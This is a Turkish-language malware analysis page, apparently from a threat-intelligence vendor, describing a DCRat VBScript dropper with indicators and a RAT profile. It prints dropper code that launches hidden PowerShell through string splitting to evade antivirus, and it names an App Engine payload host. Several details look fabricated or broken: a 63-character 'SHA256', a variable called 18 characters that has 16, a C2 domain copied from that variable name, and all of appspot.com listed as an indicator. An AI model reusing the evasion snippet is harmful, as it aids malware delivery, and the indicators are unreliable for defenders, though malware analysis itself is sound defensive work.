Manuel Statik Analiz — DCRat VBScript Dropper | Tehdit: YUKSEK
Dosya Kimliği
| SHA256 | 71c79c58dc14cf561031536b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2 |
|---|---|
| Dosya Adı | sostener1.vbs (İspanyolca "tutmak/desteklemek" + VBScript) |
| Boyut | 1.031.536 byte (1MB VBScript) |
| String Sayisi | 777 |
VBScript Obfuskasyon Teknikleri
Gelişmiş Obfuskasyon: 18 karakterlik rastgele değişken adları + string bölme tekniği!
-- 18-karakter rastgele değişken adı:
set geutqmonpmjthuux = CreateObject("WScript.Shell")
geutqmonpmjthuux.Run "power" + "shell " & (fxltxsmdgsuadkcx) , 0, false
-- "power" + "shell " = string concatenation ile AV bypass!
-- AV'ler "powershell" kelimesini tarar ama "power"+"shell"i kaçırabilir
-- geutqmonpmjthuux = 18 karakter sözlüksüz ad (tanıma engellemesi)
-- 0 = Gizli çalıştır (pencere gösterme!)
-- false = Beklemeden devam et (async execution)
Google AppEngine Payload Barındırma
rodriakd-8413d.appspot.com/o/dll/DLL 18-... -- rodriakd-8413d = Google Firebase/AppEngine proje ID'si -- appspot.com = Google App Engine (meşru bulut → whitelist'lerde) -- /o/dll/ = Firebase Storage binary endpoint -- Güvenlik ürünleri *.appspot.com'u genelde güvenilir sayar!
IOC
| SHA256 | 71c79c58dc14cf561031536b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2 |
|---|---|
| Dropper | sostener1.vbs (İspanyolca, WScript.Shell, gizli çalıştırma) |
| Payload Host | rodriakd-8413d.appspot.com (Google AppEngine kötüye kullanımı) |
| Teknik | "power"+"shell" string split + 18-char obfuscated var |
DCRat2 — Malware Profile
DCRat DarkCrystal RAT 2019 Rus underground. Plugin tabanlı modüler. VBScript dropper. .Ru TLD C2. sostener LATAM hedefleme.
Malware Type
RAT
Programming Language
C#/.NET
C2 Protocol
TCP/HTTP
Target Systems
Küresel
Capabilities & Behavior
Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması
IOC List (1 indicators)
IOC — DCRat2
# DOMAIN
appspot.com
| Type | Value | Note |
|---|---|---|
| domain | appspot.com |
C2 Servers (1 recorded servers for this family)
| Address | Type | Port | Protocol | Status | Country |
|---|---|---|---|---|---|
| geutqmonpmjthuux.ru | domain | 443 | HTTP | inactive | — |
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.